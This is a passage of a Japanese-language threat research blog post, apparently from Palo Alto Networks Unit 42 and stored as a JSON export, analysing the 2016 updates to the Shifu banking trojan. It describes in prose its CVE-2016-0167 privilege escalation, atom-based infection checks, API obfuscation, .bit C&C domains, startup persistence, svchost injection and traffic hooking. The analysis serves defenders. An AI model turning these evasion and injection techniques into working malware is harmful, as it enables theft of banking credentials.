{"id":106805,"date":"2017-01-06T12:00:36","date_gmt":"2017-01-06T20:00:36","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=106805"},"modified":"2020-04-26T21:49:58","modified_gmt":"2020-04-27T04:49:58","slug":"unit42-2016-updates-shifu-banking-trojan","status":"publish","type":"post","link":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/","title":{"rendered":"Shifu\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e2016\u5e74\u306e\u66f4\u65b0"},"content":{"rendered":"<h2>\u6982\u8981<\/h2>\n<p style=\"font-weight: 400;\">Shifu\u306f2015\u5e74\u306b\u521d\u3081\u3066\u767a\u898b\u3055\u308c\u305f\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3067\u3042\u308a\u3001Zeus\u304c\u4f7f\u7528\u3057\u3066\u3044\u308b\u624b\u6cd5\u3092\u53d6\u308a\u8fbc\u3093\u3060Shiz\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u8005\u306fShifu\u3092\u4f7f\u7528\u3057\u3066\u4e16\u754c\u4e2d\u306e\u30aa\u30f3\u30e9\u30a4\u30f3 \u30d0\u30f3\u30ad\u30f3\u30b0\u306eWeb\u30b5\u30a4\u30c8\u306b\u95a2\u3059\u308b\u8cc7\u683c\u60c5\u5831\u3092\u76d7\u307f\u51fa\u3057\u307e\u3059\u3002\u6a19\u7684\u3068\u306a\u3063\u305fWeb\u30b5\u30a4\u30c8\u306f\u5f53\u521d\u30ed\u30b7\u30a2\u306e\u30b5\u30a4\u30c8\u3067\u3057\u305f\u304c\u3001\u305d\u306e\u5f8c\u82f1\u56fd\u3001\u30a4\u30bf\u30ea\u30a2\u306a\u3069\u306e\u30b5\u30a4\u30c8\u306b\u53ca\u3093\u3067\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">Palo Alto Networks\u306eUnit 42\u306e\u30ea\u30b5\u30fc\u30c1\u306b\u3088\u308a\u3001Shifu\u306e\u4f5c\u6210\u8005\u304c2016\u5e74\u306bShifu\u3092\u9032\u5316\u3055\u305b\u305f\u3053\u3068\u304c\u5206\u304b\u3063\u3066\u3044\u307e\u3059\u3002\u307e\u305f\u3001Microsoft Windows\u30b7\u30b9\u30c6\u30e0\u3092\u611f\u67d3\u3055\u305b\u3001\u691c\u51fa\u3092\u56de\u907f\u3059\u308b\u305f\u3081\u306e\u8907\u6570\u306e\u65b0\u624b\u6cd5\u304cShifu\u306b\u53d6\u308a\u5165\u308c\u3089\u308c\u305f\u3053\u3068\u3082\u5206\u304b\u3063\u3066\u3044\u307e\u3059\u3002\u65b0\u624b\u6cd5\u306e\u4e00\u90e8\u3068\u3057\u3066\u4ee5\u4e0b\u306e\u3082\u306e\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">Microsoft Windows\u306e\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027\u3067\u3042\u308bCVE-2016-0167\u3092\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3057\u3066SYSTEM\u30ec\u30d9\u30eb\u306e\u6a29\u9650\u3092\u53d6\u5f97\u3002\u4ee5\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306eShifu\u306fCVE-2015-0003\u3092\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3057\u3066\u540c\u3058\u76ee\u7684\u3092\u679c\u305f\u3057\u307e\u3057\u305f\u3002<\/li>\n<li style=\"font-weight: 400;\">\u30db\u30b9\u30c8\u304c\u65e2\u306bShifu\u306b\u611f\u67d3\u3057\u3066\u3044\u308b\u304b\u78ba\u8a8d\u3059\u308b\u305f\u3081\u306b\u3001\u4ee5\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u305f\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u306b\u52a0\u3048\u3001Windows\u306e\u30a2\u30c8\u30e0\u3092\u4f7f\u7528\u3002<\/li>\n<li style=\"font-weight: 400;\">\u95a2\u6570\u547c\u3073\u51fa\u3057\u304c\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30a2\u30ca\u30ea\u30b9\u30c8\u306b\u898b\u3064\u304b\u3089\u306a\u3044\u3088\u3046\u306b\u3059\u308b\u305f\u3081\u3001\u201cpush-calc-ret\u201d\u65b9\u5f0f\u306eAPI\u96e3\u8aad\u5316\u3092\u5229\u7528\u3002<\/li>\n<li style=\"font-weight: 400;\">\u4ee3\u66ff\u3068\u306a\u308bNamecoin\u306e.bit\u30c9\u30e1\u30a4\u30f3\u306e\u4f7f\u7528<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">Shifu\u3068\u4ed6\u306e\u30c4\u30fc\u30eb\u3068\u306e\u9593\u306e\u65b0\u305f\u306a\u95a2\u9023\u3082\u7a81\u304d\u6b62\u3081\u307e\u3057\u305f\u304c\u3001\u3053\u308c\u3089\u306e\u95a2\u9023\u304b\u3089\u3001Shifu\u304c\u5358\u7d14\u306bShiz\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306b\u4f9d\u62e0\u3057\u305f\u3082\u306e\u3067\u306f\u306a\u304fShiz\u306e\u6700\u65b0\u306e\u9032\u5316\u7248\u3067\u3042\u308b\u3053\u3068\u306f\u307b\u307c\u78ba\u5b9f\u3067\u3042\u308b\u3068\u601d\u308f\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u672c\u30ec\u30dd\u30fc\u30c8\u306e\u4e3b\u305f\u308b\u76ee\u7684\u306f\u3001\u4ed6\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u5206\u6790\u3057\u3066\u3044\u308b\u304c\u5c06\u6765\u3053\u306e\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306b\u906d\u9047\u3059\u308b\u53ef\u80fd\u6027\u306e\u3042\u308b\u30a2\u30ca\u30ea\u30b9\u30c8\u306b\u3001Shifu\u306e\u65b0\u6a5f\u80fd\u3092\u7d39\u4ecb\u3059\u308b\u3053\u3068\u3067\u3059\u3002\u4ee5\u4e0b\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u3053\u306e\u65b0\u6a5f\u80fd\u306b\u3064\u3044\u3066\u6982\u8981\u3092\u304a\u4f1d\u3048\u3057\u307e\u3059\u3002\u7d42\u308f\u308a\u306e\u65b9\u306e\u4ed8\u9332\u306b\u306fShifu\u306e\u6a5f\u80fd\u306e\u5168\u822c\u306b\u95a2\u3059\u308b\u6280\u8853\u7684\u306a\u8a73\u7d30\u60c5\u5831\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<h3>Shifu\u306b\u304a\u3051\u308b\u65b0\u305f\u306a\u958b\u767a\u304a\u3088\u3073\u6a5f\u80fd<\/h3>\n<p style=\"font-weight: 400;\">\u672c\u5206\u6790\u3067\u691c\u8a0e\u3059\u308bShifu\u306f\u6570\u6bb5\u968e\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089\u69cb\u6210\u3055\u308c\u3066\u304a\u308a\u30012016\u5e746\u6708\u306b\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u307e\u3057\u305f\u3002\u4ee5\u4e0b\u306e\u56f3\u306f\u3001\u5b9f\u884c\u5f8c\u306b\u5fa9\u53f7\u5316\u51e6\u7406\u3092\u53d7\u3051\u308b\u5404\u7a2e\u306e\u30d5\u30a1\u30a4\u30eb\u304c\u521d\u671f\u30ed\u30fc\u30c0\u30fc\u306b\u542b\u307e\u308c\u3066\u3044\u308b\u69d8\u5b50\u3092\u8868\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_23105\" aria-describedby=\"caption-attachment-23105\" style=\"width: 402px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_1.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-23105 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_1.png\" alt=\"\u56f31 Shifu\u306e\u30d5\u30a1\u30a4\u30eb\u69cb\u9020\" width=\"402\" height=\"750\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_1.png 402w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_1-161x300.png 161w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_1-370x690.png 370w\" sizes=\"(max-width: 402px) 100vw, 402px\" \/><\/a><figcaption id=\"caption-attachment-23105\" class=\"wp-caption-text\">\u56f31 Shifu\u306e\u30d5\u30a1\u30a4\u30eb\u69cb\u9020<\/figcaption><\/figure>\n<p style=\"font-weight: 400;\">\u6700\u521d\u306e\u96e3\u8aad\u5316\u6e08\u307f\u30ed\u30fc\u30c0\u30fc(x86\u7248exe)\u306b\u306f\u7b2c2\u6bb5\u968e\u306e\u6697\u53f7\u5316\u6e08\u307f\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc(x86\u7248exe)\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u6700\u521d\u306e\u30ed\u30fc\u30c0\u30fc\u306f\u3001\u5f8c\u3067\u6b21\u306e\u30ec\u30a4\u30e4\u30fc\u7528\u306bVirtualAlloc()\u306b\u3088\u308a\u30e1\u30e2\u30ea\u3092\u5272\u308a\u5f53\u3066\u308b\u3053\u3068\u3067\u3001\u5fa9\u53f7\u5316\u7528\u306b3\u3064\u306e\u30ec\u30a4\u30e4\u30fc\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u304c\u30e1\u30e2\u30ea\u306e\u4e2d\u306b\u5fa9\u53f7\u5316\u3055\u308c\u308b\u3068\u3001\u5143\u306e\u30ed\u30fc\u30c0\u30fc \u30d7\u30ed\u30bb\u30b9\u304c\u3053\u308c\u3067\u4e0a\u66f8\u304d\u3055\u308c\u307e\u3059\u3002\u6b21\u306b\u30bb\u30af\u30b7\u30e7\u30f3 \u30d5\u30e9\u30b0\u304c\u8abf\u6574\u3055\u308c\u3001IAT\u30a2\u30c9\u30ec\u30b9\u304c\u89e3\u6c7a\u3055\u308c\u307e\u3059\u3002\u6700\u5f8c\u306e\u5fa9\u53f7\u5316\u30ec\u30a4\u30e4\u30fc\u306f\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306e\u5165\u308a\u53e3\u70b9\u306b\u30b8\u30e3\u30f3\u30d7\u3057\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u306f<a href=\"https:\/\/technet.microsoft.com\/en-us\/library\/security\/ms16-039.aspx\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">CVE-2016-0167<\/a>\u7528\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c2\u3064(x86\/x64)\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u304c\u3001\u3053\u308c\u3089\u306e\u30b3\u30f3\u30d1\u30a4\u30eb \u30bf\u30a4\u30e0 \u30b9\u30bf\u30f3\u30d7\u306f2016\u5e742\u6708\u3067\u3059\u3002\u3053\u306e\u30b3\u30f3\u30d1\u30a4\u30eb\u306e\u6642\u70b9\u306b\u304a\u3044\u3066\u3001\u3053\u306e\u8106\u5f31\u6027\u306b\u5bfe\u3059\u308b\u30d1\u30c3\u30c1\u306f\u307e\u3060\u5165\u624b\u53ef\u80fd\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3067\u3057\u305f\u3002\u3057\u304b\u3057\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30b3\u30f3\u30d1\u30a4\u30eb \u30bf\u30a4\u30e0 \u30b9\u30bf\u30f3\u30d7\u306f2016\u5e746\u6708\u3067\u3059\u3002\u3053\u306e\u3053\u3068\u304b\u3089\u3001Shifu\u306e\u3053\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u80cc\u5f8c\u306b\u3044\u308b\u4eba\u7269\u305f\u3061\u304c\u30bc\u30ed\u30c7\u30a4 \u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u5f53\u6642\u5165\u624b\u3067\u304d\u308b\u72b6\u614b\u3067\u3042\u3063\u305f\u304b\u3001\u3042\u308b\u3044\u306f\u305d\u306e\u5f8c\u306b\u5165\u624b\u3057\u305f\u3053\u3068\u304c\u4f3a\u3048\u308b\u3068\u8a00\u3063\u3066\u3082\u3044\u3044\u3067\u3057\u3087\u3046\u3002\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u30ed\u30fc \u30c7\u30a3\u30b9\u30af \u30d5\u30a1\u30a4\u30eb\u3092\u30e1\u30e2\u30ea\u306b\u305f\u3060\u30b3\u30d4\u30fc\u3059\u308b\u3060\u3051\u306e\u3053\u3068\u3092\u53ef\u80fd\u306b\u3059\u308b\u8208\u5473\u6df1\u3044\u624b\u6cd5\u3092\u4f7f\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u30e1\u30e2\u30ea\u5185\u3067\u5b9f\u884c\u53ef\u80fd\u306a\u3082\u306e\u306b\u3059\u308b\u305f\u3081\u30012\u3064\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u672b\u5c3e\u306bPE\u30aa\u30fc\u30d0\u30fc\u30ec\u30a4\u3068\u3057\u3066\u8ffd\u52a0\u3055\u308c\u305f\u3001\u7279\u5225\u4ed5\u69d8\u306ePE\u30ed\u30fc\u30c0\u30fc \u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u3092\u4f7f\u3044\u307e\u3059\u3002\u3053\u306e\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306f\u3001\u5fc5\u8981\u3068\u306a\u308b\u3042\u3089\u3086\u308b\u8abf\u6574\u3092\u884c\u3063\u3066\u9069\u5207\u306a\u5b9f\u884c\u53ef\u80fd\u306a\u30e1\u30e2\u30ea \u30a4\u30e1\u30fc\u30b8\u3092\u53d6\u5f97\u3057\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u305d\u306e\u3088\u3046\u306b\u3059\u308c\u3070\u3001\u30d5\u30a1\u30a4\u30eb\u3092\u30e1\u30e2\u30ea \u30d0\u30c3\u30d5\u30a1\u30fc\u306b\u30b3\u30d4\u30fc\u3059\u308b\u3060\u3051\u3067\u3088\u304f\u3001\u3042\u3068\u306f\u5b9f\u884c\u3092\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306b\u307e\u304b\u305b\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u307e\u305f\u3001\u79c1\u305f\u3061\u306f\u30b9\u30bf\u30f3\u30c9\u30a2\u30ed\u30f3\u7248(x86\/64)\u3067\u3042\u308b\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u5225\u306e\u4e9c\u7a2e\u3082\u8907\u6570\u767a\u898b\u3057\u307e\u3057\u305f\u304c\u3001Shifu\u306b\u304a\u3051\u308b\u306e\u3068\u540c\u69d8\u306b\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u57cb\u3081\u8fbc\u307e\u308c\u305f\u30d0\u30fc\u30b8\u30e7\u30f3\u3082\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u3055\u3089\u306b\u3001Vawtrak\u3068\u3044\u3046\u30d0\u30fc\u30b8\u30e7\u30f3\u3092\u7a81\u304d\u6b62\u3081\u307e\u3057\u305f\u3002\u3053\u308c\u306b\u306f\u3001\u30b3\u30f3\u30d1\u30a4\u30eb \u30bf\u30a4\u30e0 \u30b9\u30bf\u30f3\u30d7\u306b\u3088\u308c\u3070\u30012015\u5e7411\u6708\u306b\u307e\u3067\u9061\u308b\u53e4\u3044\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306eVawtrak\u30b5\u30f3\u30d7\u30eb\u81ea\u8eab\u306e\u30b3\u30f3\u30d1\u30a4\u30eb \u30bf\u30a4\u30e0 \u30b9\u30bf\u30f3\u30d7\u306f2016\u5e741\u6708\u3067\u3059\u304b\u3089\u3001\u3053\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u5229\u7528\u3059\u308b\u30de\u30eb\u30a6\u30a7\u30a2\u3068\u3057\u3066\u306f\u79c1\u305f\u3061\u304c\u77e5\u3063\u3066\u3044\u308b\u4e8b\u5b9f\u4e0a\u6700\u521d\u306e\u3082\u306e\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u306f\u3001\u4ee5\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u985e\u4f3c\u306e\u5206\u6790\u5bfe\u7b56\u30c8\u30ea\u30c3\u30af\u304c\u3044\u304f\u3064\u304b\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u30022\u500b\u306e\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u5f15\u6570\u3082\u542b\u307e\u308c\u3066\u304a\u308a\u3001\u3053\u308c\u3089\u306e\u5f15\u6570\u306b\u306f\u30de\u30eb\u30a6\u30a7\u30a2\u304c\u307e\u3060\u958b\u767a\u4e2d\u306e\u3082\u306e\u3067\u3042\u308b\u3053\u3068\u3092\u793a\u3059\u6a5f\u80fd\u304c\u5099\u308f\u3063\u3066\u3044\u307e\u3059\u3002\u3055\u3089\u306b\u3001\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u30a2\u30c8\u30e0\u3092\u4f7f\u7528\u3057\u3066\u30b7\u30b9\u30c6\u30e0\u304c\u65e2\u306b\u611f\u67d3\u3057\u3066\u3044\u308b\u304b\u78ba\u8a8d\u3057\u307e\u3059\u3002\u3064\u307e\u308a\u3001\u4eca\u65e5\u306e\u5927\u90e8\u5206\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u304c\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u3092\u4f7f\u3063\u3066\u3044\u307e\u3059\u304c\u3001\u305d\u308c\u3068\u306f\u9055\u3046\u65b9\u6cd5\u3067\u3059\u3002\u30a2\u30c8\u30e0\u306e\u4f7f\u7528\u306f\u65b0\u3057\u3044\u624b\u6cd5\u3067\u306f\u306a\u3044\u3082\u306e\u306e\u3001\u307e\u3060\u305d\u308c\u307b\u3069\u5e83\u304f\u666e\u53ca\u306f\u3057\u3066\u3044\u307e\u305b\u3093\u3002<\/p>\n<p style=\"font-weight: 400;\">\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u6697\u53f7\u5316\u3055\u308c\u3001\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306e.tls\u30bb\u30af\u30b7\u30e7\u30f3\u5185\u306b\u5727\u7e2e\u3055\u308c\u305f\u72b6\u614b\u3067\u7f6e\u304b\u308c\u307e\u3059\u3002\u3053\u308c\u306f\u307e\u305a\u5fa9\u53f7\u5316\u3055\u308c\u3001\u3064\u3044\u3067aPLib\u5727\u7e2e\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u3063\u3066\u89e3\u51cd\u3055\u308c\u307e\u3059\u3002\u6c38\u7d9a\u6027\u306e\u65b9\u6cd5\u3068\u3057\u3066\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u6700\u521d\u306e\u30ed\u30fc\u30c0\u30fc\u3092AppData\u30d5\u30a9\u30eb\u30c0\u30fc\u306b\u30b3\u30d4\u30fc\u3057\u3001\u305d\u308c\u3092\u6307\u3057\u793a\u3059Jscript\u30d5\u30a1\u30a4\u30eb\u3092Startup\u30d5\u30a9\u30eb\u30c0\u30fc\u5185\u306b\u4f5c\u6210\u3057\u307e\u3059\u3002\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u3092svchost\u306ex86\u7248\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u5185\u90e8\u306b\u30a4\u30f3\u30b8\u30a7\u30af\u30c8\u3057\u3001\u305d\u306eAPI\u95a2\u6570\u547c\u3073\u51fa\u3057\u306b\u5bfe\u3057\u3066\u96e3\u8aad\u5316\u624b\u6cd5\u3092\u4f7f\u3063\u3066\u30d1\u30c3\u30c1\u3092\u5f53\u3066\u3066\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u95a2\u3059\u308b\u9759\u7684\u89e3\u6790\u304a\u3088\u3073\u52d5\u7684\u89e3\u6790\u3092\u3044\u3063\u305d\u3046\u56f0\u96e3\u306a\u3082\u306e\u306b\u3057\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u4ee5\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u3082\u306e\u306b\u6bd4\u3079\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306b\u306f\u66f4\u65b0\u304c\u3044\u304f\u3064\u304b\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u305d\u306e\u4e2d\u306b\u306f\u3001\u88ab\u5bb3\u8005\u306e\u30b7\u30b9\u30c6\u30e0\u3001\u30d6\u30e9\u30a6\u30b6\u306e\u6a19\u7684\u306e\u30ea\u30b9\u30c8\u3001\u304a\u3088\u3073\u30dc\u30c3\u30c8 \u30b3\u30de\u30f3\u30c9\u306b\u95a2\u3057\u3066\u691c\u7d22\u3092\u884c\u3046\u305f\u3081\u306e\u6587\u5b57\u5217\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f.bit\u306e\u30c8\u30c3\u30d7\u30ec\u30d9\u30eb \u30c9\u30e1\u30a4\u30f3\u3092\u4f7f\u7528\u3057\u3066C&amp;C\u30b5\u30fc\u30d0\u3068\u9023\u7d61\u3092\u53d6\u308a\u307e\u3059\u3002\u30c9\u30e1\u30a4\u30f3\u540d\u3001\u30e6\u30fc\u30b6\u30fc \u30a8\u30fc\u30b8\u30a7\u30f3\u30c8\u6587\u5b57\u5217\u3001\u304a\u3088\u3073URL\u5f15\u6570\u306f\u6539\u9020\u3055\u308c\u305fRC4\u6697\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u7528\u3044\u3066\u6697\u53f7\u5316\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u30c9\u30e1\u30a4\u30f3\u540d\u304b\u3089\u3001\u653b\u6483\u8005\u304c\u30a6\u30af\u30e9\u30a4\u30ca\u5728\u4f4f\u3067\u3042\u308b\u304b\u3001\u3042\u308b\u3044\u306f\u30a6\u30af\u30e9\u30a4\u30ca\u3067\u80b2\u3063\u305f\u304b\u306e\u3044\u305a\u308c\u304b\u3067\u3042\u308b\u53ef\u80fd\u6027\u304c\u4f3a\u3048\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u3042\u3044\u306b\u304f\u5206\u6790\u6642\u306b\u306fC&amp;C\u30b5\u30fc\u30d0\u304c\u3069\u306e\u30b3\u30de\u30f3\u30c9\u306b\u5bfe\u3057\u3066\u3082\u5fdc\u7b54\u3057\u306a\u304b\u3063\u305f\u305f\u3081\u3001\u6a19\u7684\u306b\u3055\u308c\u305f\u91d1\u878d\u6a5f\u95a2\u306b\u3064\u3044\u3066\u3053\u308c\u4ee5\u4e0a\u5206\u6790\u3092\u9032\u3081\u308b\u3053\u3068\u306f\u3067\u304d\u307e\u305b\u3093\u3067\u3057\u305f\u3002\u3053\u306e\u60c5\u5831\u306f\u3001\u901a\u5e38\u3067\u3042\u308c\u3070\u3001\u88ab\u5bb3\u8005\u306e\u30c7\u30a3\u30b9\u30af\u306e\u8a2d\u5b9a\u30d5\u30a1\u30a4\u30eb\u306b\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u308b\u3067\u3057\u3087\u3046\u3002\u81ea\u8eab\u306e\u4e00\u90e8\u306e\u6a5f\u80fd\u306e\u305f\u3081\u306b\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u81ea\u8eab\u304c\u30a4\u30f3\u30b8\u30a7\u30af\u30c8\u3055\u308c\u3066\u3044\u308bsvchost.exe\u30d7\u30ed\u30bb\u30b9\u5185\u90e8\u306bAPI\u95a2\u6570\u3092\u30d5\u30c3\u30af\u3057\u307e\u3059\u3002\u3055\u3089\u306b\u3001Web\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3092\u76ee\u7684\u3068\u3057\u3066Apache Web\u30b5\u30fc\u30d0\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002C&amp;C\u30b5\u30fc\u30d0\u304b\u3089Apache Web\u30b5\u30fc\u30d0\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u3053\u3068\u306b\u6210\u529f\u3059\u308b\u3068\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u30ec\u30a4\u30e4\u30fc\u5316\u3055\u308c\u305f\u30b5\u30fc\u30d3\u30b9 \u30d7\u30ed\u30d0\u30a4\u30c0\u30fc\u3092\u5229\u7528\u3057\u3066Winsock API\u306b\u30d5\u30c3\u30af\u3092\u4ed5\u639b\u3051\u307e\u3059\u304c\u3001\u305d\u306e\u76ee\u7684\u306f\u30a4\u30f3\u30d0\u30a6\u30f3\u30c9\u304a\u3088\u3073\u30a2\u30a6\u30c8\u30d0\u30a6\u30f3\u30c9\u306e\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8 \u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3092\u508d\u53d7\u3057\u3001\u6539\u3056\u3093\u3059\u308b\u3053\u3068\u3067\u3059\u3002\u307e\u305f\u3001\u305d\u306e\u4ed6\u306e\u591a\u304f\u306e\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306b\u898b\u3089\u308c\u308b\u30d6\u30e9\u30a6\u30b6 \u30cd\u30c3\u30c8\u30ef\u30fc\u30ad\u30f3\u30b0\u95a2\u6570\u306b\u30d5\u30c3\u30af\u3092\u4ed5\u639b\u3051\u308b\u305f\u3081\u306e\u3001\u901a\u5e38\u4f7f\u7528\u3055\u308c\u308b\u30e1\u30bd\u30c3\u30c9\u3082\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u7b2c2\u6bb5\u968e\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u3068\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306e\u3069\u3061\u3089\u306b\u3082\u3001\u6c7a\u3057\u3066\u4f7f\u7528\u3055\u308c\u308b\u3053\u3068\u306e\u306a\u3044\u6587\u5b57\u5217\u304c\u5927\u91cf\u306b\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u3053\u3068\u304b\u3089\u3001\u4f5c\u6210\u8005\u304c\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u5927\u6025\u304e\u3067\u69cb\u7bc9\u3057\u305f\u304b\u3001\u305a\u3055\u3093\u306a\u3084\u308a\u65b9\u3067\u958b\u767a\u304c\u884c\u308f\u308c\u305f\u304b\u306e\u3044\u305a\u308c\u304b\u3067\u3042\u308b\u3053\u3068\u304c\u4f3a\u3048\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 